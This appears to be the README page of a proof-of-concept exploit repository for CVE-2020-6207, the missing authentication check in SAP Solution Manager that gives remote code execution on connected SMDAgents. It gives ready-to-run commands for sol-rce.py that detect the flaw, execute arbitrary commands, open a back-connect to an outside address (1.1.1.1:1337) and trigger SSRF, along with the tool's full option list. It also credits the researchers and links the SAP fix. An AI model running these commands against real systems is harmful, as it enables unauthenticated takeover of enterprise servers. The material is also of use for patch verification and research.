
PoC details: c161971ee131e0c86475d9fc79a41ac2bb11a14e

Related vulnerability
Title: SAP Solution Manager access control error vulnerability (CVE-2020-6207)
Description: SAP Solution Manager is a system management platform from the German company SAP that combines system monitoring, the SAP support desk, self-service, ASAP implementation and other functions. It helps customers manage the life cycle of their SAP solutions and provides system monitoring, remote support services and upgrades of SAP product components. SAP Solution Manager (User Experience Monitoring) version 7.2 contains a security vulnerability caused by the program performing no authentication at all for the service. An attacker can exploit this vulnerability to compromise all of the Solution Manager-connected SMDAge
Introduction
PoC for **CVE-2020-6207**  (Missing Authentication Check in SAP Solution Manager)  
This script checks for and exploits the missing authentication check in the SAP EEM servlet (`tc~smd~agent~application~eem`), which leads to RCE on SAP SMDAgents connected to SAP Solution Manager.  
Original finding: 
- [Pablo Artuso](https://twitter.com/lmkalg)
- [Yvan 'iggy' G](https://twitter.com/_1ggy) 

Paper: [An Unauthenticated Journey to Root: Pwning Your Company's Enterprise Software Servers](https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf)  
Solution: SAP Note [2890213](https://launchpad.support.sap.com/#/notes/2890213)

Follow me on Twitter: [@_chipik_](https://twitter.com/_chipik)

***This project is created only for educational purposes and cannot be used for law violation or personal gain.
<br>The author of this project is not responsible for any possible harm caused by the materials of this project***


# Details

You will find the vulnerability details in the [Process](./Process.md) article.

# How to use

Just point the script at the SAP Solution Manager hostname/IP.

## Check

```
➜ python sol-rce.py -H 172.16.30.43 -P 50000 -c
Vulnerable! [CVE-2020-6207] - http://172.16.30.43:50000
```

## Trigger RCE

```
➜ python sol-rce.py -H 172.16.30.43 -P 50000 --rce calc.exe
```

![gif](img/rce.gif) 

## Get BackConnect

```
➜ python sol-rce.py -H 172.16.30.43 -P 50000 --back 1.1.1.1:1337
```

## SSRF 

```
➜ python sol-rce.py -H 172.16.30.43 -P 50000 --ssrf http://1.1.1.1/chpk
```

## Other

There are additional options:
```
➜ python sol-rce.py -h

usage: sol-rce.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-d VICTIM]
                  [--ssrf SSRF] [--rce RCE] [--back BACK] [--setup SETUP]
                  [--list] [--clear] [-t TIMEOUT] [-v]

PoC for CVE-2020-6207, (Missing Authentication Check in SAP Solution Manager)
This script allows to check and exploit missing authentication checks in SAP EEM servlet (tc~smd~agent~application~eem) that lead to RCE on SAP SMDAgents connected to SAP Solution Manager
Original finding:
- Pablo Artuso. https://twitter.com/lmkalg
- Yvan 'iggy' G https://twitter.com/_1ggy

Paper: https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
Solution: https://launchpad.support.sap.com/#/notes/2890213

twitter: https://twitter.com/_chipik

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  SAP Solution Manager host(default: 127.0.0.1)
  -P PORT, --port PORT  SAP Solution Manager web port (default: tcp/50000)
  -p PROXY, --proxy PROXY
                        Use proxy (ex: 127.0.0.1:8080)
  -s, --ssl             enable SSL
  -c, --check           just detect vulnerability
  -d VICTIM, --victim VICTIM
                        DA serverName
  --ssrf SSRF           exploit SSRF. Point http address here. (example:http://1.1.1.1/chpk)
  --rce RCE             exploit RCE
  --back BACK           get backConnect from DA. (ex: 1.1.1.1:1337)
  --setup SETUP         setup a random serverName to the DA with the given hostName and instanceName. (example: javaup.mshome.net,SMDA97)
  --list                Get a list of existing DA servers
  --clear               stop and delete all PoCScript<rnd> scripts from DA servers
  -t TIMEOUT, --timeout TIMEOUT
                        HTTP connection timeout in second (default: 10)
  -v, --verbose         verbose mode
```
File snapshot

```
[4.0K] /data/pocs/c161971ee131e0c86475d9fc79a41ac2bb11a14e
├── [1.0K] detect.rules
├── [4.0K] img
│   ├── [ 13K] calc.png
│   ├── [ 66K] dainstall.png
│   ├── [315K] enabledEem.png
│   ├── [301K] getAllAgentInfo.png
│   ├── [329K] notenabled.png
│   ├── [9.7M] rce.gif
│   ├── [ 83K] resources1.png
│   ├── [ 41K] ssrf.png
│   └── [499K] wsdl.png
├── [ 16K] Process.md
├── [3.5K] README.md
└── [ 19K] sol-rce.py

1 directory, 13 files
```